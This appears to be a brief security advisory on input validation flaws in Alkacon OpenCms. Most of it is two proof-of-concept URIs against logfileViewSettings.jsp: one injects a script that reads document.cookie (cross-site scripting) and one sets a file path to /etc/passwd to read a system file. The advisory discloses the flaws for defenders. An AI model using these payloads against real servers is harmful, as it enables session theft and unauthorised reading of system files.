|
Alkacon OpenCms Multiple Input Validation Vulnerabilities
An attacker can use a browser to exploit these issues. To exploit a cross-site scripting vulnerability, the attacker must entice an unsuspecting victim into following a malicious URI. The following proof-of-concept URIs are available: http://www.example.com/opencms/system/workplace/admin/workplace/logfileview/logfileViewSettings.jsp? isLogfile.0=true&isLogfile.0.value=true&enabled.0=true&enabled.0.value=true &ok=Ok&action=save &closelink=%252Fopencms%252Fopencms%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Fworkplace%252Flogfileview &elementname=undefined&page=page1&style=new &path=%252Fworkplace%252Flogfileview%252FlogfileViewSettings &elementindex=0&framename=admin_content&windowSize.0=8000&fileEncoding.0=UTF-8 &filePath.0=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E http://www.example.com/opencms/system/workplace/admin/workplace/logfileview/logfileViewSettings.jsp? isLogfile.0=true&isLogfile.0.value=true&enabled.0=true&enabled.0.value=true &ok=Ok&action=save &closelink=%252Fopencms%252Fopencms%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Fworkplace%252Flogfileview &elementname=undefined&page=page1&style=new &path=%252Fworkplace%252Flogfileview%252FlogfileViewSettings &elementindex=0&framename=admin_content&windowSize.0=8000&fileEncoding.0=UTF-8 &filePath.0=%2Fetc%2Fpasswd |
|
|
Privacy Statement |